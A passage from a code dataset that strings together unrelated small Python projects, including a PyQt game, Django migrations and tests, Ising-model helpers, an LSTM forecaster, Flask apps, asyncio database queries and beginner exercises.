'harold.kumar@whitecastle.com')\n\n fname = '%s.eml' % (fixture_name)\n path = join(project_root(), 'tests/fixtures/files', fname)\n\n with open(path, 'r') as f:\n raw_message_format = f.read().strip()\n\n # Template Substitutions\n message_string = raw_message_format.replace('%SENDER%', sender)\n message_string = message_string.replace('%RECIPIENT%', recipient)\n message_string = message_string.replace('%RECRUITER_NAME%', recruiter_name)\n message_string = message_string.replace('%RECRUITER_EMAIL%', recruiter_email)\n\n mime_message = email.message_from_string(message_string)\n return InboundEmailMessage(mime_message)\n\n\nclass MockIdentityService(object):\n\n @staticmethod\n def init_app_engine_user_service(test):\n \"\"\"For tests that may not require a user but still need the service to\n be active.\n \"\"\"\n test.testbed.init_user_stub()\n\n @staticmethod\n def stub_app_engine_user(test, **options):\n \"\"\"Stubs App Engine user service.\n \"\"\"\n email = options.get('email', 'user@gmail.com')\n user_id = hashlib.md5(email).hexdigest()\n is_admin = str(int(options.get('as_admin', False)))\n\n test.testbed.setup_env(USER_EMAIL=email,\n USER_ID=user_id,\n USER_IS_ADMIN=is_admin,\n overwrite=True)\n test.testbed.init_user_stub()\n return user_id\n","repo_name":"klenwell/decruiter","sub_path":"app-engine/tests/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":5959,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"70837539757","text":"import json\nimport sys\n\nfrom PyQt5.QtCore import Qt\nfrom PyQt5.QtWidgets import QWidget, QToolButton, QApplication, QDesktopWidget, QLabel, QListWidget\nimport requests\n\nfrom saverank import SaveRank\nfrom main import Main\n\n\nclass Intro (QWidget):\n url = \"https://sw-adproject-ahpjy.run.goorm.io/rank/\"\n\n def __init__(self):\n super().__init__()\n\n self.setFixedSize(300, 600)\n\n self.rankList = QListWidget(self)\n self.setRank()\n\n self.startButton = QToolButton(self)\n self.startButton.setText(\"Start\")\n self.startButton.clicked.connect(self.startGame)\n 
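# absolute-coordinate layout; positions assume the fixed 300x600 window set above\n        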
self.startButton.move(130, 435)\n        self.startButton.show()\n\n        self.tutorialLabel = QLabel(self)\n        self.tutorialLabel.setText(\"Click and drag the mouse to move\\n\\nPress the Tab key to fire bullets\")\n        self.tutorialLabel.move(10, 550)\n        self.tutorialLabel.show()\n\n\n    def saveShow(self, score):\n        rank = SaveRank(self, score)\n        rank.show()\n\n    def startGame(self):\n        Main(self)\n\n    def setRank(self):\n        self.rankList.clear()\n        rankList = self.getRank()\n        if rankList:\n            for i, content in enumerate(rankList):\n                self.rankList.insertItem(i, content[0] + \" - \" + str(content[1]))\n        self.rankList.move(10, 10)\n        self.rankList.show()\n\n    def getRank(self):\n        try:\n            return self.jsonToList(requests.get(self.url + 'list').json())\n        except:\n            return False\n\n    def saveRank(self, userName, score):\n        requests.get(self.url + 'save/' + userName + \"/\" + str(score))\n        try:\n            return self.setRank()\n        except:\n            return False\n\n    def jsonToList(self, content):\n        ranks = []\n        for obj in content.get(\"rank\"):\n            ranks.append([obj.get(\"userName\"), obj.get(\"score\")])\n        return ranks\n\n\nif __name__ == \"__main__\":\n    app = QApplication(sys.argv)\n    intro = Intro()\n    intro.show()\n    sys.exit(app.exec_())","repo_name":"jisang0706/SW2_ADProject","sub_path":"game/intro.py","file_name":"intro.py","file_ext":"py","file_size_in_byte":2012,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"4382851286","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n    dependencies = [\n    ]\n\n    operations = [\n        migrations.CreateModel(\n            name='Category',\n            fields=[\n                ('id', models.AutoField(serialize=False, primary_key=True, auto_created=True, verbose_name='ID')),\n                ('name', models.CharField(max_length=200)),\n                ('desc', models.TextField()),\n            ],\n            options={\n            },\n            bases=(models.Model,),\n        ),\n        migrations.CreateModel(\n            name='Rating',\n            fields=[\n                ('id', models.AutoField(serialize=False, primary_key=True, auto_created=True, verbose_name='ID')),\n                ('comment', models.TextField()),\n                ('overall_rating', models.DecimalField(max_digits=10, decimal_places=9)),\n                ('qual_of_doc', models.DecimalField(max_digits=10, decimal_places=9)),\n                ('efficacy', models.DecimalField(max_digits=10, decimal_places=9)),\n                ('usability', models.DecimalField(max_digits=10, decimal_places=9)),\n            ],\n            options={\n            },\n            bases=(models.Model,),\n        ),\n        migrations.CreateModel(\n            name='Tool',\n            fields=[\n                ('id', models.AutoField(serialize=False, primary_key=True, auto_created=True, verbose_name='ID')),\n                ('name', models.CharField(max_length=100)),\n                ('desc', models.TextField()),\n                ('link', models.TextField()),\n                ('overall_score', models.DecimalField(max_digits=10, decimal_places=9)),\n                ('qual_of_doc', models.DecimalField(max_digits=10, decimal_places=9)),\n                ('efficacy', models.DecimalField(max_digits=10, decimal_places=9)),\n                ('usability', models.DecimalField(max_digits=10, decimal_places=9)),\n                ('free', models.BooleanField(default=False)),\n                ('online', models.BooleanField(default=False)),\n                ('review_count', models.PositiveIntegerField()),\n            ],\n            options={\n            },\n            bases=(models.Model,),\n        ),\n        migrations.CreateModel(\n            name='ToolCat',\n            fields=[\n                ('id', models.AutoField(serialize=False, primary_key=True, auto_created=True, verbose_name='ID')),\n                ('cat_id', models.ForeignKey(to='ratings.Category')),\n                ('tool_id', models.ForeignKey(to='ratings.Tool')),\n            ],\n            options={\n            },\n            bases=(models.Model,),\n        ),\n        migrations.AddField(\n            
model_name='rating',\n name='tool_id',\n field=models.ForeignKey(to='ratings.Tool'),\n preserve_default=True,\n ),\n ]\n","repo_name":"WayneManion/feHelix","sub_path":"ratings/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":2892,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"35974380680","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport sys\nsys.path.append('../')\n\nfrom loglizer.models.RPCA import R_pca\nfrom loglizer import dataloader, preprocessing\n\n\n \nstruct_log = '../data/OpenStack/20k+4k destroy+10k undefined +4k dhcp.log_structured.csv' # The structured log file\nlabel_file = '../data/OpenStack/20k+4k destroy + 10k undefiend+4k dhcp_label.csv' # The anomaly label file\n\n\nif __name__ == '__main__':\n \n (x_train, y_train), (x_test, y_test), DataFrame = dataloader.load_OpenStack(struct_log,\n label_file=label_file,\n window='session', \n train_ratio=0.5,\n split_type='uniform')\n feature_extractor = preprocessing.FeatureExtractor()\n x_train = feature_extractor.fit_transform(x_train, term_weighting='tf-idf'\n )\n x_test = feature_extractor.transform(x_test)\n \n model = R_pca(x_train, threshold=0.8)\n L, S = model.fit2(max_iter=600, iter_print=100)\n \n print('Train validation:')\n precision, recall, f1, accuracy, y_pred = model.evaluate1(x_train, y_train)\n \n print('Test validation:')\n precision, recall, f1, accuracy, y_pred = model.evaluate2(x_test, y_test)\n \n","repo_name":"ParisaKalaki/OpenStack","sub_path":"loglizer/demo/RPCA-demo.py","file_name":"RPCA-demo.py","file_ext":"py","file_size_in_byte":1411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"26194506315","text":"'''\nHelper functions for the analysis of DRH data (and preprocessing)\nVMP 2022-02-06: refactored with chatGPT and docstrings. \n'''\n\nimport numpy as np\nimport itertools \nimport pandas as pd \nimport networkx as nx \nimport matplotlib.pyplot as plt \nfrom matplotlib.colors import rgb2hex\nfrom tqdm import tqdm \n\n# taken from coniii enumerate\ndef fast_logsumexp(X, coeffs=None):\n \"\"\"correlation calculation in Ising equation\n\n Args:\n X (np.Array): terms inside logs\n coeffs (np.Array, optional): factors in front of exponential. Defaults to None.\n\n Returns:\n float: sum of exponentials\n \"\"\"\n Xmx = max(X)\n if coeffs is None:\n y = np.exp(X-Xmx).sum()\n else:\n y = np.exp(X-Xmx).dot(coeffs)\n\n if y<0:\n return np.log(np.abs(y))+Xmx, -1.\n return np.log(y)+Xmx, 1.\n\n# still create J_combinations is slow for large number of nodes\ndef p_dist(h, J):\n \"\"\"return probabilities for 2**h states\n\n Args:\n h (np.Array): local fields\n J (np.Array): pairwise couplings. 
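One coupling per node pair, i.e. length n*(n-1)/2 for n nodes.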
\n\n    Returns:\n        np.Array: probabilities for all configurations\n    \"\"\"\n    n_nodes = len(h)\n    hJ = np.concatenate((h, J))\n    h_combinations = np.array(list(itertools.product([1, -1], repeat = n_nodes)))\n    J_combinations = np.array([list(itertools.combinations(i, 2)) for i in h_combinations])\n    J_combinations = np.add.reduce(J_combinations, 2)\n    J_combinations[J_combinations != 0] = 1\n    J_combinations[J_combinations == 0] = -1\n    condition_arr = np.concatenate((h_combinations, J_combinations), axis = 1)\n    flipped_arr = hJ * condition_arr\n    summed_arr = np.sum(flipped_arr, axis = 1)\n    logsumexp_arr = fast_logsumexp(summed_arr)[0]\n    Pout = np.exp(summed_arr - logsumexp_arr)\n    return Pout[::-1]\n\ndef bin_states(n, sym=True):\n    \"\"\"generate 2**n possible configurations\n\n    Args:\n        n (int): number of questions (features)\n        sym (bool, optional): symmetric system. Defaults to True.\n\n    Returns:\n        np.Array: 2**n configurations \n    \"\"\"\n    v = np.array([list(np.binary_repr(i, width=n)) for i in range(2**n)]).astype(int)\n    if sym is False:\n        return v\n    return v*2-1\n\n# '''https://stackoverflow.com/questions/42752610/python-how-to-generate-the-pairwise-hamming-distance-matrix'''\ndef hamming_distance(X):\n    \"\"\"Calculate Hamming distance\n\n    Args:\n        X (np.Array): Array of binary values (rows = configurations, columns = binary answers)\n\n    Returns:\n        np.Array: hamming distance (rows * rows)\n    \"\"\"\n    return (X[:, None, :] != X).sum(2)\n\ndef top_n_idx(N, p, ind_colname='config_id', prob_colname='config_prob'):\n    \"\"\"get the most probable N states\n\n    Args:\n        N (int): number of configurations wanted\n        p (np.Array): array of probabilities for configurations\n        ind_colname (str, optional): desired column name for index column. Defaults to 'config_id'.\n        prob_colname (str, optional): desired column name for probability column. Defaults to 'config_prob'.\n\n    Returns:\n        pd.DataFrame: Dataframe with most probable N states, their index and probability\n    \"\"\"\n    N = N+1\n    val_cutoff = np.sort(p)[-N]\n    p_ind = np.argwhere(p > val_cutoff).flatten()\n    p_val = p[p_ind]\n    data_out = pd.DataFrame({ind_colname: p_ind, prob_colname: p_val}).nlargest(N, prob_colname)\n    return data_out.reset_index(drop = True)\n\ndef sort_edge_attributes(Graph, weight_attribute, filter_attribute, scaling = 1): \n    \"\"\"Return list of edges and list of edge weights, both sorted by edge weights (filtered, scaled)\n\n    Args:\n        Graph (nx.Graph): networkx graph object with weight_attribute and filter_attribute\n        weight_attribute (str): weight attribute (could be other attribute, but should be numeric)\n        filter_attribute (str): filter attribute (e.g. only hamming distance == 1).\n        scaling (numeric): scaling of weights (for visualization purposes). Defaults to 1 (not scaled).\n\n    Returns:\n        lists: list of edges, list of edge weights. 
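Only edges whose filter_attribute equals 1 are kept.\n\n    Example (illustrative; assumes a graph G with these edge attributes and a node layout pos):\n        >>> edges, weights = sort_edge_attributes(G, 'weight', 'hamming', scaling=5)\n        >>> nx.draw_networkx_edges(G, pos, edgelist=edges, width=weights)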
\n \"\"\"\n ## get edge attributes\n edge_weight = nx.get_edge_attributes(Graph, weight_attribute)\n edge_hdist = nx.get_edge_attributes(Graph, filter_attribute)\n\n ## sort edge weights by value\n edge_weights_sorted = sorted(edge_weight.items(), key=lambda x: x[1])\n edge_weights_filtered = [(k, v) for k, v in edge_weights_sorted if edge_hdist[k] == 1]\n \n # scale edge weights\n edge_weights_scaled = [(k, v * scaling) for k, v in edge_weights_filtered]\n \n # return edge list and scaled weights\n edge_list = [k for k, _ in edge_weights_scaled]\n edge_weights = [v for _, v in edge_weights_scaled]\n \n return edge_list, edge_weights\n\ndef sort_node_attributes(Graph, sorting_attribute, value_attribute):\n \"\"\"Sort nodes based on attribute and return sorted node list and value list\n\n Args:\n Graph (nx.Graph): networkx graph object\n sorting_attribute (str): string containing sorting attribute\n value_attribute (str): string containing value attribute\n\n Returns:\n lst: list of sorted nodes and values\n \"\"\"\n sorting_attr = nx.get_node_attributes(Graph, sorting_attribute)\n nodelist_sorted = [k for k, v in sorted(sorting_attr.items(), key=lambda item: item[1])]\n value_attr = nx.get_node_attributes(Graph, value_attribute)\n value_sorted = [v for k, v in sorted(value_attr.items(), key=lambda pair: nodelist_sorted.index(pair[0]))]\n return nodelist_sorted, value_sorted\n\ndef hamming_edges(N, H_distances):\n \"\"\"Get edgelist with hamming distance for the top N states\n\n Args:\n N (int): Number of configurations\n H_distances (np.Array): Array of hamming distances (shape N * N)\n\n Returns:\n _type_: _description_\n \"\"\"\n col_names = [f'hamming{x}' for x in range(N)]\n df = pd.DataFrame(H_distances, columns=col_names)\n df['node_x'] = df.index\n df = pd.wide_to_long(df, stubnames=\"hamming\", i='node_x', j='node_y').reset_index()\n df = df[df['node_x'] != df['node_y']]\n df.drop_duplicates(inplace=True)\n return df\n\ndef edge_strength(G, nodestrength):\n \"\"\"Add multiplicative and additive edge strength based on node attribute\n\n Args:\n G (nx.Graph): networkx graph object\n nodestrength (str): node attribute (numeric)\n\n Returns:\n nx.Graph: New graph with added edge attributes\n \"\"\"\n Gcopy = G.copy()\n for edge_x, edge_y in Gcopy.edges():\n pmass_x = Gcopy.nodes[edge_x][nodestrength]\n pmass_y = Gcopy.nodes[edge_y][nodestrength]\n Gcopy.edges[(edge_x, edge_y)].update({\n 'pmass_mult': pmass_x * pmass_y,\n 'pmass_add': pmass_x + pmass_y\n })\n return Gcopy\n\ndef match_nodeid(df, node_id, N = 10):\n \"\"\"get the entries associated with a particular node_id in descending order of probability\n\n Args:\n df (pd.DataFrame): dataframe with columns \"node_id\", \"entry_name\", \"entry_id\", \"entry_prob\"\n node_id (int): node identifier, typically integer.\n N (int, optional): number of rows to print. Defaults to 10.\n \"\"\"\n df = df[df['node_id'] == node_id][['entry_name', 'entry_id', 'entry_prob']]\n df = df.sort_values('entry_prob', ascending = False)\n print(df.head(N))\n\ndef match_substring(df, entry_name, N = 10):\n \"\"\"Returns entries containing substring\n\n Args:\n df (pd.DataFrame): dataframe with column \"entry_name\"\n entry_name (string): substring to match in \"entry_name\" column\n N (int, optional): number of rows to display. 
Defaults to 10.\n \"\"\"\n df = df[df['entry_name'].str.contains(entry_name)]\n print(df.head(N))\n \n\ndef hamming_neighbors_N_removed(N, config_id_focal, configurations, configuration_probabilities): \n \"\"\"return Hamming neighbors within hamming distance N\n\n Args:\n N (int): Hamming distance from focal node (config_id_focal)\n config_id_focal (int): index of focal configuration\n configurations (np.Array): array of configurations\n configuration_probabilities (np.Array): array of probabilities\n\n Returns:\n pd.DataFrame: dataframe with Hamming neighbors of focal node\n \"\"\"\n config_focal = configurations[config_id_focal]\n config_prob_focal = configuration_probabilities[config_id_focal]\n lst_neighbors = [(config_id_focal, config_prob_focal, config_id_neighbor, configuration_probabilities[config_id_neighbor], np.count_nonzero(config_focal!=config_neighbor))\n for config_id_neighbor, config_neighbor in enumerate(configurations) \n if np.count_nonzero(config_focal!=config_neighbor) <= N and config_id_focal != config_id_neighbor]\n df_neighbors = pd.DataFrame(\n lst_neighbors,\n columns = ['config_id_focal', 'config_prob_focal', 'config_id_neighbor', 'config_prob_neighbor', 'hamming'] \n )\n return df_neighbors","repo_name":"victor-m-p/humanities-glass","sub_path":"preprocessing/fun.py","file_name":"fun.py","file_ext":"py","file_size_in_byte":8845,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"73"} +{"seq_id":"16865949460","text":"#Goal: remove vowels unless they start the word, remove consecutive letters. \r\n\r\nf = 'Hello everybody. I wanted to say something. If it were true that life had meaning, then life must have a higher power as meaning is constructed through being.'\r\n\r\ndef vowel_remove(text):\r\n new_text = ''\r\n for char in text:\r\n if char == 'a' or char == 'e' or char == 'i' or char == 'o' or char == 'u':\r\n char = ''\r\n new_text += char\r\n new_text += char\r\n return new_text\r\n\r\ndef vowel_remove_mod(text):\r\n text = text.lower()\r\n end_text = text[::-1]\r\n ind = 0 \r\n new_text = ''\r\n while ind != -1:\r\n word = text[ind:ind + 2]\r\n for char in text[ind + 2:text.find(' ', ind + 1)]:\r\n if char == 'a' or char == 'e' or char == 'i' or char == 'o' or char == 'u':\r\n char = ''\r\n word += char\r\n else:\r\n word += char\r\n new_text += word\r\n ind = text.find(' ', ind + 1)\r\n return new_text + end_text[0]\r\n\r\ndef cons_remove(text):\r\n count = -1\r\n new_text = ''\r\n for char in text:\r\n if char == text[count]:\r\n char = ''\r\n new_text += char\r\n count += 1\r\n else:\r\n new_text += char\r\n count += 1\r\n return new_text\r\n\r\ndef polish(text):\r\n inc_text = vowel_remove_mod(cons_remove(text))\r\n first_word = inc_text[0:inc_text.find(' ')]\r\n first_letter = first_word[0]\r\n rest_word = vowel_remove(first_word[1::])\r\n new_word = first_letter + rest_word\r\n new_text = new_word + inc_text[inc_text.find(' ')::]\r\n return new_text\r\n\r\nprint(polish(f))\r\n# print(vowel_remove(f))\r\n#--------------------\r\n\r\n#Goal: Prime Number\r\ndef prime(maxval):\r\n lst = []\r\n for val in range(1, maxval):\r\n count = 0\r\n for fac in range(2,val):\r\n if val % fac == 0:\r\n break\r\n else:\r\n count += 1 \r\n if count == val-2:\r\n lst.append(val)\r\n return lst\r\n\r\ndef special_prime(lst):\r\n frst_ind = 0\r\n scnd_ind = 1\r\n new_lst = []\r\n x = 0\r\n while x + 1 < len(lst):\r\n check_num = lst[frst_ind] + lst[scnd_ind] + 1\r\n if check_num in lst:\r\n new_lst.append(check_num)\r\n frst_ind 
+= 1\r\n scnd_ind += 1 \r\n x += 1\r\n else:\r\n frst_ind += 1\r\n scnd_ind += 1 \r\n x += 1\r\n return new_lst\r\n\r\n#mx_val = 1000\r\n#print(prime(mx_val))\r\n#print(special_prime(prime(mx_val)))\r\n#print(len(special_prime(prime(mx_val))))\r\n#print(len(special_prime(special_prime(prime(mx_val)))))\r\n\r\n#--------------------\r\n\r\n#Goal: Dice roller- takes number of faces, number of rolls, number of dice\r\nimport random\r\ndef roll(num_rolls, *args):\r\n lst = []\r\n count = 0\r\n while count != num_rolls:\r\n for arg in args:\r\n lst.append(random.randint(1,arg))\r\n count += 1\r\n return sum(lst)\r\n#print(roll(1,3,6,7,20,3,12))\r\n\r\n","repo_name":"bencoxfaxon/my-python","sub_path":"Python Projects/functional_programming.py","file_name":"functional_programming.py","file_ext":"py","file_size_in_byte":2990,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"30153527259","text":"import torch\nimport torch.nn.functional as F\nfrom torch import nn\n\nfrom ..layers import SingleEmbedding\n\nclass RecurrentModel(torch.nn.Module):\n def __init__(self, config):\n super().__init__()\n\n self.device = config.device\n\n self.num_nodes = config.num_nodes\n self.horizon = config.horizon\n self.topk = config.topk\n self.embed_dim = config.embed_dim\n self.lags = config.window_size\n\n # dummy\n self.embedding = SingleEmbedding(1, 1, 1).to(self.device)\n\n # encoder lstm\n self.lstm = nn.LSTM(self.num_nodes, 512, 2, batch_first=True, dropout=0.25)\n \n # decoder lstm\n self.cell1 = nn.LSTMCell(self.num_nodes, 512)\n self.cell2 = nn.LSTMCell(512, 512)\n\n # linear prediction layer\n self.pred = nn.Linear(512, self.num_nodes)\n\n def get_graph(self):\n return self.embedding.get_A()\n \n def get_embedding(self):\n return self.embedding.get_E()\n\n\n def forward(self, window):\n # batch stacked window; input shape: [num_nodes*batch_size, lags]\n N = self.num_nodes # number of nodes\n T = self.lags # number of input time steps\n B = window.size(0) // N # batch size\n\n x = window.view(B, T, N)\n\n # encoder\n _, (h, c) = self.lstm(x) # -> (B, T, H), (2, B, H), (2, B, H)\n # get hidden and cell states for each layer\n h1 = h[0, ...].squeeze(0)\n h2 = h[1, ...].squeeze(0)\n c1 = c[0, ...].squeeze(0)\n c2 = c[1, ...].squeeze(0)\n\n # decoder\n predictions = []\n for _ in range(self.horizon-1):\n pred = self.pred(h2)\n predictions.append(pred.view(-1, 1))\n # layer 1\n h1, c1 = self.cell1(pred, (h1, c1))\n h1 = F.dropout(h1, 0.2)\n c1 = F.dropout(c1, 0.2)\n # layer 2\n h2, c2 = self.cell2(h1, (h2, c2))\n # final prediction\n pred = self.pred(h2).view(-1, 1)\n predictions.append(pred)\n\n return torch.cat(predictions, dim=1)\n\n\n","repo_name":"timbrockmeyer/mulivariate-time-series-anomaly-detection","sub_path":"src/models/LSTM.py","file_name":"LSTM.py","file_ext":"py","file_size_in_byte":2060,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"73"} +{"seq_id":"6081406060","text":"from flask import Flask, render_template, redirect\nfrom flask_pymongo import PyMongo\nimport scrape_mars\n\n# create Flask instance\napp = Flask(__name__)\n\n# use PyMongo to establish connection\n# mongo = PyMongo(app, uri=\"mongodb://localhost:27017/mars_db\")\napp.config[\"MONGO_URI\"] = \"mongodb://localhost:27017/mars_app\"\nmongo = PyMongo(app)\n\n\n@app.route(\"/\")\ndef home():\n\n # find data from mongo database\n mars = mongo.db.collection.find_one()\n\n # return template and data\n return 
render_template(\"index.html\", mars=mars)\n\n@app.route(\"/scrape\")\ndef scrape():\n\n mars = mongo.db.collection\n \n mars_info = scrape_mars.scrape()\n mars_info = scrape_mars.mars_image()\n # mars_info = scrape_mars.mars_weather()\n mars_info = scrape_mars.mars_facts()\n mars_info = scrape_mars.mars_hemispheres()\n\n mars.update({}, mars_info, upsert=True)\n \n return redirect(\"/\")\n\nif __name__ == \"__main__\":\n app.run(debug=True)","repo_name":"rickshev/Web-Scraping-Challenge","sub_path":"Mission_to_Mars/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":942,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"74967982635","text":"import asyncio\nimport sys\nfrom concurrent.futures.process import ProcessPoolExecutor\nfrom typing import List, Dict\nfrom utils import get_pool\n\nsys.path.append(\"src\")\nfrom util.async_timer import async_timed\n\nproduct_query = \"\"\"\n SELECT\n p.product_id,\n p.product_name,\n p.brand_id,\n s.sku_id,\n pc.product_color_name,\n ps.product_size_name\n FROM product as p\n JOIN sku as s on s.product_id = p.product_id\n JOIN product_color as pc on pc.product_color_id = s.product_color_id\n JOIN product_size as ps on ps.product_size_id = s.product_size_id\n WHERE p.product_id = 100\"\"\"\n\n\nasync def query_product(pool):\n async with pool.acquire() as connection:\n return await connection.fetchrow(product_query)\n\n\n@async_timed()\nasync def query_product_concurrently(pool, query_num):\n queries = [query_product(pool) for _ in range(query_num)]\n return await asyncio.gather(*queries)\n\n\ndef run_in_new_loop(num_queries: int) -> List[Dict]:\n async def run_queries():\n async with get_pool() as pool:\n return await query_product_concurrently(pool, num_queries)\n\n results = [dict(result) for result in asyncio.run(run_queries())]\n return results\n\n\n@async_timed()\nasync def main():\n loop = asyncio.get_running_loop()\n pool = ProcessPoolExecutor()\n tasks = []\n for _ in range(5):\n tasks.append(loop.run_in_executor(pool, run_in_new_loop, 10000))\n\n all_results: List[List[Dict]] = await asyncio.gather(*tasks)\n total_queries = sum([len(result) for result in all_results])\n print(f\"Retrieved {total_queries} products the product database.\")\n\n\nif __name__ == \"__main__\":\n asyncio.run(main())\n","repo_name":"akitanak/python_concurrency_with_asyncio","sub_path":"src/database/query_products_one_event_loop_per_process.py","file_name":"query_products_one_event_loop_per_process.py","file_ext":"py","file_size_in_byte":1695,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"892218438","text":"def shuffle(n):\n if n <= 0:\n return ''\n\n discarteds = []\n cards = get_cards(n)\n\n while True:\n if len(cards) <= 1:\n break\n\n discarteds.append(cards.pop())\n top = cards.pop()\n\n cards = [top] + cards\n\n return (\n \"Discarded cards: \" + ', '.join(int_list_to_string(discarteds)) + \"\\n\"\n \"Remaining card: \" + str(cards.pop())\n )\n\n\ndef get_cards(n):\n return [card + 1 for card in range(n)][::-1]\n\n\ndef int_list_to_string(int_list):\n return [str(x) for x in int_list]\n\n\nif __name__ == '__main__':\n while True:\n n = int(input())\n if n == 0:\n break\n\n print(shuffle(n))\n","repo_name":"SergioVenicio/URI","sub_path":"1110/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":677,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"73"} 
+{"seq_id":"27023351874","text":"from django.test import TestCase\n\nfrom ..models import Recipe, Tag\n\nclass RecipeTestCase(TestCase):\n\n def setUp(self):\n self.recipe_data = {\n 'name': 'recipe-test',\n 'description': 'description',\n 'image': 'needs-to-be-data',\n 'difficulty': 'E',\n 'serves': 1,\n 'time_prep': 2,\n 'time_cook': 3,\n 'time_other': 4\n }\n Recipe.objects.create(**self.recipe_data)\n \n def test_create(self):\n recipe = Recipe.objects.get(name=self.recipe_data['name'])\n self.assertEqual(recipe.name, self.recipe_data['name'])\n self.assertEqual(recipe.description, self.recipe_data['description'])\n self.assertEqual(len(recipe.tags.all()), 0)\n self.assertEqual(len(recipe.steps.all()), 0)\n \n def test_add_tag(self):\n recipe = Recipe.objects.get(name=self.recipe_data['name'])\n Tag.objects.create(name='test')\n tag = Tag.objects.get(name='test')\n recipe.add_tag(tag)\n recipe = Recipe.objects.get(name=self.recipe_data['name'])\n self.assertEqual(len(recipe.tags.all()), 1)\n","repo_name":"JoelPagliuca/ReciPi-2017","sub_path":"com.jpagliuca.recipi/src/main/api/recipiApi/recipi/tests/test_models.py","file_name":"test_models.py","file_ext":"py","file_size_in_byte":1145,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"73"} +{"seq_id":"74585205355","text":"l = int(input())\r\ns = list(map(int, input().split()))\r\nn = int(input())\r\n\r\ns.sort()\r\nif n in s :\r\n print(0)\r\nelse :\r\n min = 0\r\n max = 0\r\n for i in s :\r\n if i < n :\r\n min = i\r\n elif i > n and max == 0 :\r\n max = i\r\n min += 1\r\n max -= 1\r\n print((n-min)*(max-n+1) +(max-n))","repo_name":"ellieso/algorithm_study","sub_path":"백준/Silver/1059. 좋은 구간/좋은 구간.py","file_name":"좋은 구간.py","file_ext":"py","file_size_in_byte":326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"27055578001","text":"from flask import Flask, render_template, request\nimport re\nimport yaml\nfrom options import options, options_dict\n\napp = Flask(__name__)\n\n# Ruta principal para mostrar el formulario y el resultado\n@app.route('/', methods=['GET', 'POST'])\ndef index():\n if request.method == 'POST':\n docker_command = request.form['docker_command']\n docker_compose_yaml = convert_to_docker_compose(docker_command)\n return docker_compose_yaml\n\n return render_template('index.html')\n\ndef find_options(command):\n # separa las palabras de command para obtener luego la imagen\n command_sep = command.split()\n # Expresión regular para buscar opciones en el comando\n pattern = r\"-(\\w+)|--(\\w+[-\\w]+)|--(\\w+)\"\n # Buscar coincidencias de opciones en el comando\n matches = re.findall(pattern, command)\n # Lista para almacenar las opciones encontradas\n found_options = []\n # Procesar las coincidencias y compararlas con el diccionario de opciones\n for match in matches:\n option = match[0] or match[1] or match[2] # El resultado puede estar en una de las tres posiciones\n\n if f\"--{option}\" in options:\n value=''\n value_index = command.index(option) + len(option) + 1\n if value_index < len(command):\n for i in range(value_index, len(command)):\n value += command[i]\n if command[i].startswith(' '):\n break\n value = value.strip()\n found_options.append((option, value))\n elif f\"-{option}\" in options:\n value=''\n value_index = command.index(option) + len(option) + 1\n if value_index < len(command):\n for i in range(value_index, len(command)):\n value += command[i]\n if command[i].startswith(' '):\n break\n value = 
value.strip()\n            found_options.append((option, value))\n\n    image = None\n    for word in command_sep:\n        if any(word in option for option in found_options) or word.lower() in ['docker', 'run']:\n            continue\n        if not word.startswith('-'):\n            image = word\n            break\n    if image is not None:\n        found_options.append((\"image\", image))\n\n\n    return found_options\n\n\ndef convert_to_docker_compose(command):\n    # get the options found in the command\n    options_found = find_options(command)\n\n    # extract the image from the found options\n    image_name = None\n    for option, value in options_found:\n        if option == 'image':\n            image_name = value\n            break\n\n    # build the Docker Compose text fragment\n    docker_compose_text = f'version: \"3.3\"\\n' \\\n                          f'services:\\n' \\\n                          f'  {image_name}:\\n' \\\n                          f'    image: {image_name}\\n'\n\n    # add the options to the Docker Compose text fragment\n    for option, value in options_found:\n        if option != 'image' and option in options_dict:\n            compose_key = options_dict[option]\n            if '/' in compose_key:\n                compose_key, sub_key = compose_key.split('/')\n                docker_compose_text += f\"    {compose_key}:\\n\" \\\n                                       f\"      {sub_key}:\\n\" \\\n                                       f\"        {value}\\n\"\n            else:\n                docker_compose_text += f\"    {compose_key}: {value}\\n\"\n\n    # generate the Docker Compose YAML\n    docker_compose_yaml = yaml.safe_dump(docker_compose_text, sort_keys=False, default_style='|')\n    docker_compose_yaml = docker_compose_yaml.strip('|')\n    return docker_compose_yaml\n\nif __name__ == '__main__':\n    app.run(host='0.0.0.0', debug=True)\n","repo_name":"nomadecool/docker-compose","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"22070924612","text":"import numpy as np\nimport random\nimport math\nimport matplotlib.pyplot as plt\nimport time\n\nclass Particle:\n    def __init__(self, position, velocity = 0):\n        self.position = position\n        self.velocity = velocity\n        self.local_best = position\n    \n    def update_position(self, position_limits):\n        self.position = round((self.position + self.velocity), 0)\n\n        # set position to the min or max value if it goes out of bounds\n        if self.position > position_limits[1]:\n            self.position = position_limits[1]\n        elif self.position < position_limits[0]:\n            self.position = position_limits[0]\n    \n    def update_velocity(self, inertia, alpha, beta, global_best):\n        self.velocity 